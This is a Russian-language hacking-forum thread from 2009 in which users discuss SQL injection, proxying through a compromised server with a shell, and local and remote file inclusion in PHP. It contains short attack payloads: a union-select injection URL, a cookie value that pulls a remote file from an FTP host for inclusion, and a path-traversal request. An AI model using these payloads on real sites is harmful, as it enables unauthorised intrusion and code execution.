 |
|
17.10.2009, 13:10
|
|
Постоянный
Регистрация: 09.07.2006
Сообщений: 553
С нами:
10441826
Репутация:
1861
|
|
Сообщение от Byrger
Привет есть стандартная инъекция в MySQL вида:
site.ru/index.php?id=1+union+select+1,2,3,4,5--+
Возможно ли сделать UPDATE или INSERT в базу?
нет
|
|
|
17.10.2009, 15:59
|
|
Постоянный
Регистрация: 07.03.2008
Сообщений: 479
С нами:
9567480
Репутация:
61
|
|
Возможно ли сделать прокси из сервера на котором есть шелл?
Если не рутить его (выдел в шелле можно порты вроде какието открывать.)
|
|
|
|
17.10.2009, 16:09
|
|
Участник форума
Регистрация: 16.02.2009
Сообщений: 191
С нами:
9069748
Репутация:
438
|
|
Сообщение от Byrger
Возможно ли сделать прокси из сервера на котором есть шелл?
Если не рутить его (выдел в шелле можно порты вроде какието открывать.)
https://forum.antichat.ru/thread93318.html
|
|
|
|
17.10.2009, 16:21
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Есть скрипт, который проверяет является ли папкой (ф-цией is_dir) значение skin в куках. Если да, то идёт инклюд:
PHP код:
if(is_dir($_COOKIE['skin']))
include($_COOKIE['skin'].'/template.php');
Можно ли реализовать LFI произвольного файла, а не только template.php?. Если же заюзать NULL - байт, то инклюдится ничего не будет, ибо is_dir возвратит false.
Последний раз редактировалось mailbrush; 17.10.2009 в 16:26..
|
|
|
|
17.10.2009, 16:42
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
Сообщение от Rezak
Где-то видел тут на античате тему про, то как делать эксплоит скрипта типа
он юзается примерно так: test.php?a=phpinfo&b=32
вот и подумал может с классами также можно извратиться.
P.S. Это к сообщению про вот этот скрипт
PHP код:
<?
$template->set_filenames(array('head'=>"$template_path/header.html"));
$template->pparse('head');
?>
Это можно замутить если тока register_globals = on
в php.ini
|
|
|
|
17.10.2009, 16:58
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
Сообщение от mailbrush
Есть скрипт, который проверяет является ли папкой (ф-цией is_dir) значение skin в куках. Если да, то идёт инклюд:
PHP код:
if(is_dir($_COOKIE['skin']))
include($_COOKIE['skin'].'/template.php');
Можно ли реализовать LFI произвольного файла, а не только template.php?. Если же заюзать NULL - байт, то инклюдится ничего не будет, ибо is_dir возвратит false. Там RFI
Cookie: skin=ftp://vasya:tapochkin@ftp.narod.ru/
ну а на фтпшнике соответственно файл template.php
+ "Начиная с PHP 5.0.0, эта функция также может быть использована с некоторыми упаковщиками url."
==
Если интересует именно LFI произвольного файла, то врятли
Последний раз редактировалось jokester; 17.10.2009 в 17:12..
|
|
|
|
17.10.2009, 17:03
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
С нами:
11020706
Репутация:
4693
|
|
Сообщение от Ctacok
Это можно замутить если тока register_globals = on
в php.ini
Покажи как. Вот как раз для случая с
Код:
$template->set_filenames(array('head'=>"$template_path/header.html"));
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
|
17.10.2009, 17:18
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
Сообщение от Qwazar
Покажи как. Вот как раз для случая с
Код:
$template->set_filenames(array('head'=>"$template_path/header.html"));
PHP код:
file.php?template=../index.php%0D
Ну а я вообщем то говорил про первый пример, так что строго не судите 
|
|
|
|
17.10.2009, 17:34
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Сообщение от Ctacok
PHP код:
file.php?template=../index.php%0D
Ну а я вообщем то говорил про первый пример, так что строго не судите Не будет работать, ибо глобальные массивы будут регистрироваться вначале скрипта, а после будет идти инклюд конфига какого-то, и $template заменится.
jokester, спасибо. Это мой код, т.е. исходников я палить не хотел, ибо там названия классов / ф-ция выдает двиг. В исходнике движка есть еще префикс dirname(__FILE__), т.е. папка тек. файла. Значит никак  Спасибо еще раз... Значит можно добиться только расскрытия...
Последний раз редактировалось mailbrush; 17.10.2009 в 18:06..
|
|
|
|
17.10.2009, 17:46
|
|
Новичок
Регистрация: 25.01.2008
Сообщений: 5
С нами:
9628417
Репутация:
2
|
|
Сообщение от Ctacok
PHP код:
file.php?template=../index.php%0D
Ну а я вообщем то говорил про первый пример, так что строго не судите С первым то все понятно, работает как часы
А вот этот скрипт он именно такой короткий и есть
PHP код:
$template->set_filenames(array('head'=>"$template_path/header.html"));
Просто он написан для того чтобы его инклудить в файл в котором класс template задан уже, но по глупости авторов к этому скрипту есть прямой доступ.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
